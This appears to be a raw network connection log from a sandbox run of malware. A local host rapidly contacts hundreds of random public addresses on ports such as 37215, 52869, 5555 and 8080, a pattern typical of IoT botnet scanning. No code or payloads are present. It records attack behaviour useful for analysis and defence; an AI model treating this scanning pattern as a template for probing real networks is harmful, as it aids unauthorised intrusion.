                                                                        Dec 6, 2024 00:37:06.292812109 CET595988080192.168.2.23102.187.77.194
                                                                        Dec 6, 2024 00:37:06.294487000 CET6060249152192.168.2.23121.177.118.150
                                                                        Dec 6, 2024 00:37:06.296153069 CET5689649152192.168.2.23166.196.205.22
                                                                        Dec 6, 2024 00:37:06.297700882 CET6086249152192.168.2.2325.128.176.48
                                                                        Dec 6, 2024 00:37:06.299303055 CET5726080192.168.2.2362.39.202.69
                                                                        Dec 6, 2024 00:37:06.300862074 CET5587080192.168.2.2356.100.184.78
                                                                        Dec 6, 2024 00:37:06.302409887 CET478605555192.168.2.2386.240.223.174
                                                                        Dec 6, 2024 00:37:06.303952932 CET5433852869192.168.2.23157.77.71.177
                                                                        Dec 6, 2024 00:37:06.305516005 CET441667574192.168.2.2359.9.127.185
                                                                        Dec 6, 2024 00:37:06.307099104 CET3450680192.168.2.2348.133.51.155
                                                                        Dec 6, 2024 00:37:06.308660984 CET5186452869192.168.2.2327.76.195.81
                                                                        Dec 6, 2024 00:37:06.308938980 CET372153284649.192.131.240192.168.2.23
                                                                        Dec 6, 2024 00:37:06.308952093 CET803498247.104.135.117192.168.2.23
                                                                        Dec 6, 2024 00:37:06.308969021 CET803942253.76.178.29192.168.2.23
                                                                        Dec 6, 2024 00:37:06.308984995 CET3284637215192.168.2.2349.192.131.240
                                                                        Dec 6, 2024 00:37:06.308985949 CET757458148214.171.62.194192.168.2.23
                                                                        Dec 6, 2024 00:37:06.308994055 CET3498280192.168.2.2347.104.135.117
                                                                        Dec 6, 2024 00:37:06.308996916 CET555539906115.155.24.23192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309005976 CET808057234100.26.89.18192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309024096 CET3942280192.168.2.2353.76.178.29
                                                                        Dec 6, 2024 00:37:06.309024096 CET581487574192.168.2.23214.171.62.194
                                                                        Dec 6, 2024 00:37:06.309027910 CET5286952340170.10.186.243192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309036970 CET399065555192.168.2.23115.155.24.23
                                                                        Dec 6, 2024 00:37:06.309045076 CET80425868.107.105.120192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309051991 CET572348080192.168.2.23100.26.89.18
                                                                        Dec 6, 2024 00:37:06.309053898 CET5234052869192.168.2.23170.10.186.243
                                                                        Dec 6, 2024 00:37:06.309055090 CET804694299.76.48.158192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309075117 CET8080432062.152.124.161192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309076071 CET4258680192.168.2.238.107.105.120
                                                                        Dec 6, 2024 00:37:06.309084892 CET81342427.62.201.148192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309093952 CET5286944326180.188.222.161192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309113026 CET4694280192.168.2.2399.76.48.158
                                                                        Dec 6, 2024 00:37:06.309118986 CET80803583854.118.74.41192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309122086 CET3424281192.168.2.237.62.201.148
                                                                        Dec 6, 2024 00:37:06.309122086 CET432068080192.168.2.232.152.124.161
                                                                        Dec 6, 2024 00:37:06.309129953 CET8057786205.206.30.221192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309143066 CET4432652869192.168.2.23180.188.222.161
                                                                        Dec 6, 2024 00:37:06.309143066 CET84435162292.247.69.60192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309154987 CET808040388154.211.50.52192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309164047 CET3721558788210.207.191.104192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309168100 CET358388080192.168.2.2354.118.74.41
                                                                        Dec 6, 2024 00:37:06.309169054 CET5778680192.168.2.23205.206.30.221
                                                                        Dec 6, 2024 00:37:06.309173107 CET516228443192.168.2.2392.247.69.60
                                                                        Dec 6, 2024 00:37:06.309202909 CET80804883216.177.230.17192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309205055 CET5878837215192.168.2.23210.207.191.104
                                                                        Dec 6, 2024 00:37:06.309206009 CET403888080192.168.2.23154.211.50.52
                                                                        Dec 6, 2024 00:37:06.309215069 CET80462801.9.37.1192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309222937 CET844346258192.166.138.242192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309231997 CET8149260218.77.247.153192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309241056 CET488328080192.168.2.2316.177.230.17
                                                                        Dec 6, 2024 00:37:06.309242010 CET80803608443.139.176.218192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309245110 CET4628080192.168.2.231.9.37.1
                                                                        Dec 6, 2024 00:37:06.309252024 CET462588443192.168.2.23192.166.138.242
                                                                        Dec 6, 2024 00:37:06.309267044 CET4926081192.168.2.23218.77.247.153
                                                                        Dec 6, 2024 00:37:06.309304953 CET360848080192.168.2.2343.139.176.218
                                                                        Dec 6, 2024 00:37:06.309449911 CET372155678673.58.211.50192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309465885 CET49152507704.46.56.44192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309482098 CET757459614199.92.69.73192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309487104 CET5678637215192.168.2.2373.58.211.50
                                                                        Dec 6, 2024 00:37:06.309494019 CET372154404888.54.117.228192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309503078 CET5077049152192.168.2.234.46.56.44
                                                                        Dec 6, 2024 00:37:06.309519053 CET3721559578115.106.3.245192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309535027 CET844341670163.145.48.236192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309537888 CET596147574192.168.2.23199.92.69.73
                                                                        Dec 6, 2024 00:37:06.309546947 CET4404837215192.168.2.2388.54.117.228
                                                                        Dec 6, 2024 00:37:06.309551954 CET491525319423.202.41.211192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309556961 CET5957837215192.168.2.23115.106.3.245
                                                                        Dec 6, 2024 00:37:06.309564114 CET416708443192.168.2.23163.145.48.236
                                                                        Dec 6, 2024 00:37:06.309573889 CET844357944105.54.52.184192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309583902 CET84434628813.109.184.86192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309592009 CET555538750118.151.114.80192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309596062 CET5319449152192.168.2.2323.202.41.211
                                                                        Dec 6, 2024 00:37:06.309602976 CET8060088116.166.74.245192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309612036 CET4915232884116.175.89.26192.168.2.23
                                                                        Dec 6, 2024 00:37:06.309613943 CET579448443192.168.2.23105.54.52.184
                                                                        Dec 6, 2024 00:37:06.309613943 CET462888443192.168.2.2313.109.184.86
                                                                        Dec 6, 2024 00:37:06.309629917 CET387505555192.168.2.23118.151.114.80
                                                                        Dec 6, 2024 00:37:06.309633017 CET6008880192.168.2.23116.166.74.245
                                                                        Dec 6, 2024 00:37:06.309643030 CET3288449152192.168.2.23116.175.89.26
                                                                        Dec 6, 2024 00:37:06.310261011 CET4207080192.168.2.23156.82.219.223
                                                                        Dec 6, 2024 00:37:06.311886072 CET402087574192.168.2.23158.99.48.169
                                                                        Dec 6, 2024 00:37:06.313436985 CET510467574192.168.2.23129.30.155.167
                                                                        Dec 6, 2024 00:37:06.314513922 CET8044138133.119.7.37192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314532042 CET813615091.144.116.224192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314553022 CET4413880192.168.2.23133.119.7.37
                                                                        Dec 6, 2024 00:37:06.314554930 CET528695589885.52.221.218192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314572096 CET8154248184.201.146.94192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314582109 CET4915255846116.48.214.197192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314580917 CET3615081192.168.2.2391.144.116.224
                                                                        Dec 6, 2024 00:37:06.314590931 CET80804614250.129.165.8192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314595938 CET5589852869192.168.2.2385.52.221.218
                                                                        Dec 6, 2024 00:37:06.314599991 CET5286935422185.249.96.80192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314610958 CET8043258183.178.42.191192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314615965 CET5424881192.168.2.23184.201.146.94
                                                                        Dec 6, 2024 00:37:06.314620972 CET8060098102.60.227.138192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314620972 CET5584649152192.168.2.23116.48.214.197
                                                                        Dec 6, 2024 00:37:06.314620972 CET3542252869192.168.2.23185.249.96.80
                                                                        Dec 6, 2024 00:37:06.314621925 CET461428080192.168.2.2350.129.165.8
                                                                        Dec 6, 2024 00:37:06.314644098 CET4325880192.168.2.23183.178.42.191
                                                                        Dec 6, 2024 00:37:06.314649105 CET6009880192.168.2.23102.60.227.138
                                                                        Dec 6, 2024 00:37:06.314688921 CET814899281.55.21.230192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314698935 CET80803810450.210.105.42192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314707994 CET3721545652188.195.245.36192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314717054 CET8154110123.192.215.13192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314724922 CET8056086204.30.144.174192.168.2.23
                                                                        Dec 6, 2024 00:37:06.314732075 CET4899281192.168.2.2381.55.21.230
                                                                        Dec 6, 2024 00:37:06.314739943 CET381048080192.168.2.2350.210.105.42
                                                                        Dec 6, 2024 00:37:06.314747095 CET4565237215192.168.2.23188.195.245.36
                                                                        Dec 6, 2024 00:37:06.314750910 CET5608680192.168.2.23204.30.144.174
                                                                        Dec 6, 2024 00:37:06.314754963 CET5411081192.168.2.23123.192.215.13
                                                                        Dec 6, 2024 00:37:06.315056086 CET4126881192.168.2.23179.41.218.103
                                                                        Dec 6, 2024 00:37:06.316606998 CET334868080192.168.2.2362.93.241.10
                                                                        Dec 6, 2024 00:37:06.317377090 CET80803436083.248.54.126192.168.2.23
                                                                        Dec 6, 2024 00:37:06.317414999 CET343608080192.168.2.2383.248.54.126
                                                                        Dec 6, 2024 00:37:06.318222046 CET557267574192.168.2.239.174.94.208
                                                                        Dec 6, 2024 00:37:06.319401979 CET555543718215.101.251.205192.168.2.23
                                                                        Dec 6, 2024 00:37:06.319439888 CET437185555192.168.2.23215.101.251.205
                                                                        Dec 6, 2024 00:37:06.319448948 CET8040404139.210.155.192192.168.2.23
                                                                        Dec 6, 2024 00:37:06.319487095 CET4040480192.168.2.23139.210.155.192
                                                                        Dec 6, 2024 00:37:06.319785118 CET3709880192.168.2.23138.112.67.100
                                                                        Dec 6, 2024 00:37:06.321382046 CET4633880192.168.2.235.66.245.147
                                                                        Dec 6, 2024 00:37:06.322459936 CET8036370156.90.240.187192.168.2.23
                                                                        Dec 6, 2024 00:37:06.322499990 CET3637080192.168.2.23156.90.240.187
                                                                        Dec 6, 2024 00:37:06.322561026 CET5917281192.168.2.2365.158.119.67
                                                                        Dec 6, 2024 00:37:06.323307037 CET5511680192.168.2.2364.77.154.219
                                                                        Dec 6, 2024 00:37:06.324017048 CET528693744094.177.142.161192.168.2.23
                                                                        Dec 6, 2024 00:37:06.324049950 CET3814280192.168.2.23209.75.120.198
                                                                        Dec 6, 2024 00:37:06.324054956 CET3744052869192.168.2.2394.177.142.161
                                                                        Dec 6, 2024 00:37:06.324076891 CET80804811833.72.49.85192.168.2.23
                                                                        Dec 6, 2024 00:37:06.324115038 CET481188080192.168.2.2333.72.49.85
                                                                        Dec 6, 2024 00:37:06.324771881 CET3923280192.168.2.2399.207.247.232
                                                                        Dec 6, 2024 00:37:06.325474024 CET3654081192.168.2.2339.43.84.54
                                                                        Dec 6, 2024 00:37:06.326227903 CET3434049152192.168.2.2327.39.220.124
                                                                        Dec 6, 2024 00:37:06.326961040 CET5421280192.168.2.23188.84.47.83
                                                                        Dec 6, 2024 00:37:06.327737093 CET464108080192.168.2.23130.152.81.149
                                                                        Dec 6, 2024 00:37:06.328423977 CET373528443192.168.2.23157.133.189.147
                                                                        Dec 6, 2024 00:37:06.329175949 CET4567080192.168.2.2375.46.156.121
                                                                        Dec 6, 2024 00:37:06.329905987 CET553465555192.168.2.23221.232.130.20
                                                                        Dec 6, 2024 00:37:06.330123901 CET8036152175.171.246.250192.168.2.23
                                                                        Dec 6, 2024 00:37:06.330164909 CET3615280192.168.2.23175.171.246.250
                                                                        Dec 6, 2024 00:37:06.330188990 CET8052294197.68.216.109192.168.2.23
                                                                        Dec 6, 2024 00:37:06.330199003 CET808037144157.232.42.141192.168.2.23
                                                                        Dec 6, 2024 00:37:06.330230951 CET371448080192.168.2.23157.232.42.141
                                                                        Dec 6, 2024 00:37:06.330233097 CET5229480192.168.2.23197.68.216.109
                                                                        Dec 6, 2024 00:37:06.330951929 CET80805165848.181.195.14192.168.2.23
                                                                        Dec 6, 2024 00:37:06.330993891 CET516588080192.168.2.2348.181.195.14
                                                                        Dec 6, 2024 00:37:06.332976103 CET805593484.119.107.118192.168.2.23
                                                                        Dec 6, 2024 00:37:06.333019972 CET5593480192.168.2.2384.119.107.118
                                                                        Dec 6, 2024 00:37:06.334636927 CET5286960274101.203.94.126192.168.2.23
                                                                        Dec 6, 2024 00:37:06.334659100 CET808033500140.24.155.93192.168.2.23
                                                                        Dec 6, 2024 00:37:06.334682941 CET6027452869192.168.2.23101.203.94.126
                                                                        Dec 6, 2024 00:37:06.334712029 CET335008080192.168.2.23140.24.155.93
                                                                        Dec 6, 2024 00:37:06.338418007 CET808059196190.162.9.88192.168.2.23
                                                                        Dec 6, 2024 00:37:06.338470936 CET591968080192.168.2.23190.162.9.88
                                                                        Dec 6, 2024 00:37:06.339248896 CET8150956124.175.99.173192.168.2.23
                                                                        Dec 6, 2024 00:37:06.340018034 CET808048514109.3.50.60192.168.2.23
                                                                        Dec 6, 2024 00:37:06.340028048 CET808059994220.129.74.204192.168.2.23
                                                                        Dec 6, 2024 00:37:06.340038061 CET80803648264.132.168.64192.168.2.23
                                                                        Dec 6, 2024 00:37:06.340059042 CET5095681192.168.2.23124.175.99.173
                                                                        Dec 6, 2024 00:37:06.340068102 CET485148080192.168.2.23109.3.50.60
                                                                        Dec 6, 2024 00:37:06.340070963 CET599948080192.168.2.23220.129.74.204
                                                                        Dec 6, 2024 00:37:06.340085983 CET364828080192.168.2.2364.132.168.64
                                                                        Dec 6, 2024 00:37:06.340092897 CET8055472121.142.208.105192.168.2.23
                                                                        Dec 6, 2024 00:37:06.341985941 CET5547280192.168.2.23121.142.208.105
                                                                        Dec 6, 2024 00:37:06.347419977 CET803467215.208.50.250192.168.2.23
                                                                        Dec 6, 2024 00:37:06.347470999 CET3467280192.168.2.2315.208.50.250
                                                                        Dec 6, 2024 00:37:06.349080086 CET8057546198.206.241.104192.168.2.23
                                                                        Dec 6, 2024 00:37:06.349106073 CET55554352069.249.109.177192.168.2.23
                                                                        Dec 6, 2024 00:37:06.349123001 CET5754680192.168.2.23198.206.241.104
                                                                        Dec 6, 2024 00:37:06.349142075 CET435205555192.168.2.2369.249.109.177
                                                                        Dec 6, 2024 00:37:06.350903988 CET757445952107.108.113.107192.168.2.23
                                                                        Dec 6, 2024 00:37:06.351001024 CET459527574192.168.2.23107.108.113.107
                                                                        Dec 6, 2024 00:37:06.351371050 CET8053212121.13.98.106192.168.2.23
                                                                        Dec 6, 2024 00:37:06.351412058 CET5321280192.168.2.23121.13.98.106
                                                                        Dec 6, 2024 00:37:06.358896017 CET80804191859.14.26.31192.168.2.23
                                                                        Dec 6, 2024 00:37:06.358938932 CET419188080192.168.2.2359.14.26.31
                                                                        Dec 6, 2024 00:37:06.358982086 CET844339824169.191.103.1192.168.2.23
                                                                        Dec 6, 2024 00:37:06.358992100 CET5555496582.144.236.217192.168.2.23
                                                                        Dec 6, 2024 00:37:06.358999968 CET75743445618.5.160.184192.168.2.23
                                                                        Dec 6, 2024 00:37:06.359008074 CET808042762209.9.90.236192.168.2.23
                                                                        Dec 6, 2024 00:37:06.359016895 CET757439076216.224.95.80192.168.2.23
                                                                        Dec 6, 2024 00:37:06.359026909 CET496585555192.168.2.232.144.236.217
                                                                        Dec 6, 2024 00:37:06.359033108 CET398248443192.168.2.23169.191.103.1
                                                                        Dec 6, 2024 00:37:06.359050035 CET344567574192.168.2.2318.5.160.184
                                                                        Dec 6, 2024 00:37:06.359050035 CET427628080192.168.2.23209.9.90.236
                                                                        Dec 6, 2024 00:37:06.359072924 CET390767574192.168.2.23216.224.95.80
                                                                        Dec 6, 2024 00:37:06.364257097 CET8080420328.14.41.206192.168.2.23
                                                                        Dec 6, 2024 00:37:06.364309072 CET420328080192.168.2.238.14.41.206
                                                                        Dec 6, 2024 00:37:06.366751909 CET8048178220.123.226.47192.168.2.23
                                                                        Dec 6, 2024 00:37:06.366796017 CET4817880192.168.2.23220.123.226.47
                                                                        Dec 6, 2024 00:37:06.368379116 CET528694146040.156.170.132192.168.2.23
                                                                        Dec 6, 2024 00:37:06.368398905 CET808042800196.223.36.172192.168.2.23
                                                                        Dec 6, 2024 00:37:06.368426085 CET4146052869192.168.2.2340.156.170.132
                                                                        Dec 6, 2024 00:37:06.368434906 CET428008080192.168.2.23196.223.36.172
                                                                        Dec 6, 2024 00:37:06.371537924 CET808055486180.120.70.59192.168.2.23
                                                                        Dec 6, 2024 00:37:06.371592045 CET554868080192.168.2.23180.120.70.59
                                                                        Dec 6, 2024 00:37:06.371634960 CET808053162140.22.65.76192.168.2.23
                                                                        Dec 6, 2024 00:37:06.371679068 CET531628080192.168.2.23140.22.65.76
                                                                        Dec 6, 2024 00:37:06.375176907 CET84434248637.230.73.95192.168.2.23
                                                                        Dec 6, 2024 00:37:06.375219107 CET424868443192.168.2.2337.230.73.95
                                                                        Dec 6, 2024 00:37:06.376555920 CET80804243494.215.141.54192.168.2.23
                                                                        Dec 6, 2024 00:37:06.376594067 CET424348080192.168.2.2394.215.141.54
                                                                        Dec 6, 2024 00:37:06.377902985 CET803437478.132.73.224192.168.2.23
                                                                        Dec 6, 2024 00:37:06.377943039 CET3437480192.168.2.2378.132.73.224
                                                                        Dec 6, 2024 00:37:06.379435062 CET5286955920128.91.58.4192.168.2.23
                                                                        Dec 6, 2024 00:37:06.379445076 CET8051374193.34.214.53192.168.2.23
                                                                        Dec 6, 2024 00:37:06.379481077 CET5592052869192.168.2.23128.91.58.4
                                                                        Dec 6, 2024 00:37:06.379497051 CET5137480192.168.2.23193.34.214.53
                                                                        Dec 6, 2024 00:37:06.382771969 CET8044886173.106.78.35192.168.2.23
                                                                        Dec 6, 2024 00:37:06.382782936 CET815908087.173.40.163192.168.2.23
                                                                        Dec 6, 2024 00:37:06.382812023 CET4488680192.168.2.23173.106.78.35
                                                                        Dec 6, 2024 00:37:06.382829905 CET5908081192.168.2.2387.173.40.163
                                                                        Dec 6, 2024 00:37:06.382893085 CET75745987226.69.100.31192.168.2.23
                                                                        Dec 6, 2024 00:37:06.382931948 CET598727574192.168.2.2326.69.100.31
                                                                        Dec 6, 2024 00:37:06.384459019 CET806040039.227.72.155192.168.2.23
                                                                        Dec 6, 2024 00:37:06.384500027 CET6040080192.168.2.2339.227.72.155
                                                                        Dec 6, 2024 00:37:06.388964891 CET55554578660.220.129.51192.168.2.23
                                                                        Dec 6, 2024 00:37:06.388988972 CET3721544778154.235.218.105192.168.2.23
                                                                        Dec 6, 2024 00:37:06.389008999 CET457865555192.168.2.2360.220.129.51
                                                                        Dec 6, 2024 00:37:06.389029980 CET4477837215192.168.2.23154.235.218.105
                                                                        Dec 6, 2024 00:37:06.391942978 CET491523755620.164.209.99192.168.2.23
                                                                        Dec 6, 2024 00:37:06.391985893 CET3755649152192.168.2.2320.164.209.99
                                                                        Dec 6, 2024 00:37:06.392950058 CET564068443192.168.2.23137.158.14.87
                                                                        Dec 6, 2024 00:37:06.392952919 CET5718652869192.168.2.23140.128.108.40
                                                                        Dec 6, 2024 00:37:06.392960072 CET501128443192.168.2.2328.52.126.104
                                                                        Dec 6, 2024 00:37:06.392997980 CET373187574192.168.2.23132.199.20.209
                                                                        Dec 6, 2024 00:37:06.393049955 CET362525555192.168.2.23215.153.214.163
                                                                        Dec 6, 2024 00:37:06.393053055 CET3660281192.168.2.2388.199.24.156
                                                                        Dec 6, 2024 00:37:06.393064022 CET358028080192.168.2.23159.182.246.146
                                                                        Dec 6, 2024 00:37:06.393105030 CET5604080192.168.2.2346.183.211.158
                                                                        Dec 6, 2024 00:37:06.393117905 CET4105681192.168.2.23171.52.114.81
                                                                        Dec 6, 2024 00:37:06.393167973 CET573405555192.168.2.23163.191.18.235
                                                                        Dec 6, 2024 00:37:06.393170118 CET533945555192.168.2.23160.14.3.218
                                                                        Dec 6, 2024 00:37:06.393212080 CET5230837215192.168.2.23220.130.230.90
                                                                        Dec 6, 2024 00:37:06.393218994 CET4858052869192.168.2.2345.52.252.78
                                                                        Dec 6, 2024 00:37:06.393255949 CET564768080192.168.2.23203.102.228.87
                                                                        Dec 6, 2024 00:37:06.393261909 CET3830480192.168.2.23178.16.80.106
                                                                        Dec 6, 2024 00:37:06.393297911 CET5058280192.168.2.2379.22.85.51
                                                                        Dec 6, 2024 00:37:06.393312931 CET556248080192.168.2.2381.101.181.75
                                                                        Dec 6, 2024 00:37:06.393351078 CET5769049152192.168.2.2350.184.254.142
                                                                        Dec 6, 2024 00:37:06.393388033 CET4226080192.168.2.23175.0.98.124
                                                                        Dec 6, 2024 00:37:06.393429995 CET4354049152192.168.2.23157.184.128.35
                                                                        Dec 6, 2024 00:37:06.393429995 CET4383680192.168.2.2384.191.42.55
                                                                        Dec 6, 2024 00:37:06.393450975 CET418425555192.168.2.23184.80.231.138
                                                                        Dec 6, 2024 00:37:06.393487930 CET5837480192.168.2.2315.46.95.211
                                                                        Dec 6, 2024 00:37:06.393510103 CET479265555192.168.2.2345.104.230.8
                                                                        Dec 6, 2024 00:37:06.393534899 CET4295452869192.168.2.23221.56.144.117
                                                                        Dec 6, 2024 00:37:06.393554926 CET5746680192.168.2.2322.188.96.97
                                                                        Dec 6, 2024 00:37:06.393589020 CET3613280192.168.2.23207.54.29.76
                                                                        Dec 6, 2024 00:37:06.393594980 CET571507574192.168.2.23149.149.230.210
                                                                        Dec 6, 2024 00:37:06.393615961 CET3789281192.168.2.2353.15.12.160
                                                                        Dec 6, 2024 00:37:06.393620014 CET465348080192.168.2.2396.99.41.130
                                                                        Dec 6, 2024 00:37:06.393659115 CET5641280192.168.2.23113.129.108.242
                                                                        Dec 6, 2024 00:37:06.393662930 CET3883880192.168.2.23191.59.214.138
                                                                        Dec 6, 2024 00:37:06.393692970 CET5980280192.168.2.23189.65.195.18
                                                                        Dec 6, 2024 00:37:06.393693924 CET512447574192.168.2.23111.77.188.193
                                                                        Dec 6, 2024 00:37:06.393735886 CET4579280192.168.2.2381.139.77.76
                                                                        Dec 6, 2024 00:37:06.393738031 CET4965237215192.168.2.2317.222.184.219
                                                                        Dec 6, 2024 00:37:06.393786907 CET5635649152192.168.2.2345.108.234.239
                                                                        Dec 6, 2024 00:37:06.393815041 CET486348443192.168.2.23207.83.90.76
                                                                        Dec 6, 2024 00:37:06.393821955 CET468627574192.168.2.2339.139.249.97
                                                                        Dec 6, 2024 00:37:06.393850088 CET404965555192.168.2.23116.71.38.216
                                                                        Dec 6, 2024 00:37:06.393884897 CET4769637215192.168.2.23216.25.147.56
                                                                        Dec 6, 2024 00:37:06.393901110 CET572088080192.168.2.23103.231.22.13
                                                                        Dec 6, 2024 00:37:06.393913984 CET8057842196.158.249.168192.168.2.23
                                                                        Dec 6, 2024 00:37:06.393927097 CET6076052869192.168.2.2348.117.0.63
                                                                        Dec 6, 2024 00:37:06.393946886 CET359528080192.168.2.2351.101.240.38
                                                                        Dec 6, 2024 00:37:06.393954992 CET5784280192.168.2.23196.158.249.168
                                                                        Dec 6, 2024 00:37:06.393987894 CET541428443192.168.2.231.82.77.148
                                                                        Dec 6, 2024 00:37:06.394016981 CET5593881192.168.2.23104.23.10.48
                                                                        Dec 6, 2024 00:37:06.394016981 CET4344080192.168.2.23202.113.87.111
                                                                        Dec 6, 2024 00:37:06.394041061 CET345247574192.168.2.2389.69.164.227
                                                                        Dec 6, 2024 00:37:06.394085884 CET463505555192.168.2.23149.81.97.242
                                                                        Dec 6, 2024 00:37:06.394120932 CET608087574192.168.2.23130.229.101.197
                                                                        Dec 6, 2024 00:37:06.394120932 CET533687574192.168.2.2394.23.166.65
                                                                        Dec 6, 2024 00:37:06.394148111 CET4623837215192.168.2.2343.33.231.8
                                                                        Dec 6, 2024 00:37:06.394176960 CET575848080192.168.2.23150.117.172.218
                                                                        Dec 6, 2024 00:37:06.394210100 CET576545555192.168.2.2330.199.225.176
                                                                        Dec 6, 2024 00:37:06.394212008 CET5114480192.168.2.23181.219.130.184
                                                                        Dec 6, 2024 00:37:06.394224882 CET5924280192.168.2.23132.196.243.104
                                                                        Dec 6, 2024 00:37:06.394264936 CET4574080192.168.2.2315.182.220.70
                                                                        Dec 6, 2024 00:37:06.394296885 CET504365555192.168.2.23131.116.99.90
                                                                        Dec 6, 2024 00:37:06.394299984 CET385248080192.168.2.23120.166.25.14
                                                                        Dec 6, 2024 00:37:06.394328117 CET387348080192.168.2.2396.170.47.107
                                                                        Dec 6, 2024 00:37:06.394349098 CET5898480192.168.2.23131.156.129.186
                                                                        Dec 6, 2024 00:37:06.394378901 CET5766037215192.168.2.2316.226.189.211
                                                                        Dec 6, 2024 00:37:06.394412041 CET333228080192.168.2.23125.187.103.250
                                                                        Dec 6, 2024 00:37:06.394412994 CET337448080192.168.2.23158.86.239.37
                                                                        Dec 6, 2024 00:37:06.394447088 CET584085555192.168.2.2321.134.232.205
                                                                        Dec 6, 2024 00:37:06.394449949 CET5410081192.168.2.2388.84.113.17
                                                                        Dec 6, 2024 00:37:06.394475937 CET393528443192.168.2.2325.183.80.146
                                                                        Dec 6, 2024 00:37:06.394485950 CET351708080192.168.2.2316.77.80.254
                                                                        Dec 6, 2024 00:37:06.394532919 CET590148080192.168.2.23132.49.92.222
                                                                        Dec 6, 2024 00:37:06.394536018 CET5703249152192.168.2.238.84.61.38
                                                                        Dec 6, 2024 00:37:06.394576073 CET4595880192.168.2.23164.50.155.210
                                                                        Dec 6, 2024 00:37:06.394577026 CET422865555192.168.2.2318.15.162.21
                                                                        Dec 6, 2024 00:37:06.394598007 CET581488080192.168.2.23200.230.30.18
                                                                        Dec 6, 2024 00:37:06.394632101 CET3439480192.168.2.2380.10.227.165
                                                                        Dec 6, 2024 00:37:06.394679070 CET5987849152192.168.2.23133.125.92.48
                                                                        Dec 6, 2024 00:37:06.394700050 CET3603080192.168.2.2326.105.98.70
                                                                        Dec 6, 2024 00:37:06.394748926 CET5907249152192.168.2.23189.98.38.229
                                                                        Dec 6, 2024 00:37:06.394788027 CET363707574192.168.2.23136.136.129.33
                                                                        Dec 6, 2024 00:37:06.394793987 CET518908080192.168.2.2360.1.162.124
                                                                        Dec 6, 2024 00:37:06.394800901 CET426848080192.168.2.237.10.125.112
                                                                        Dec 6, 2024 00:37:06.394829035 CET509888080192.168.2.23217.144.221.208
                                                                        Dec 6, 2024 00:37:06.394846916 CET5745252869192.168.2.2335.167.30.58
                                                                        Dec 6, 2024 00:37:06.394890070 CET5475249152192.168.2.236.202.218.89
                                                                        Dec 6, 2024 00:37:06.394915104 CET4041052869192.168.2.23119.22.161.221
                                                                        Dec 6, 2024 00:37:06.394953966 CET4130880192.168.2.2378.103.46.151
                                                                        Dec 6, 2024 00:37:06.394956112 CET422965555192.168.2.23204.63.42.89
                                                                        Dec 6, 2024 00:37:06.394984007 CET5318880192.168.2.23167.239.72.58
                                                                        Dec 6, 2024 00:37:06.394984961 CET462528080192.168.2.23199.5.195.180
                                                                        Dec 6, 2024 00:37:06.395045996 CET5054680192.168.2.23125.25.119.247
                                                                        Dec 6, 2024 00:37:06.395068884 CET4545837215192.168.2.2367.83.201.193
                                                                        Dec 6, 2024 00:37:06.395107031 CET581245555192.168.2.23115.154.10.118
                                                                        Dec 6, 2024 00:37:06.395107985 CET3316837215192.168.2.23109.102.97.141
                                                                        Dec 6, 2024 00:37:06.395138979 CET5730849152192.168.2.23113.173.184.52
                                                                        Dec 6, 2024 00:37:06.395173073 CET4877237215192.168.2.23117.185.49.141
                                                                        Dec 6, 2024 00:37:06.395193100 CET520728443192.168.2.23155.200.251.97
                                                                        Dec 6, 2024 00:37:06.395212889 CET5334281192.168.2.2316.105.15.59
                                                                        Dec 6, 2024 00:37:06.395241976 CET5141852869192.168.2.23177.37.167.95
                                                                        Dec 6, 2024 00:37:06.395258904 CET3657252869192.168.2.23113.11.42.76
                                                                        Dec 6, 2024 00:37:06.395260096 CET8055668156.158.132.221192.168.2.23
                                                                        Dec 6, 2024 00:37:06.395271063 CET4667880192.168.2.23160.212.70.21
                                                                        Dec 6, 2024 00:37:06.395302057 CET546828443192.168.2.23145.121.192.57
                                                                        Dec 6, 2024 00:37:06.395303965 CET5566880192.168.2.23156.158.132.221
                                                                        Dec 6, 2024 00:37:06.395323038 CET508028080192.168.2.23205.52.53.240
                                                                        Dec 6, 2024 00:37:06.395342112 CET475188443192.168.2.2393.197.81.37
                                                                        Dec 6, 2024 00:37:06.395370007 CET440587574192.168.2.23162.56.247.74
                                                                        Dec 6, 2024 00:37:06.395404100 CET3433280192.168.2.2397.104.12.29
                                                                        Dec 6, 2024 00:37:06.395405054 CET440865555192.168.2.23115.60.230.213
                                                                        Dec 6, 2024 00:37:06.395418882 CET5339880192.168.2.2396.215.244.85
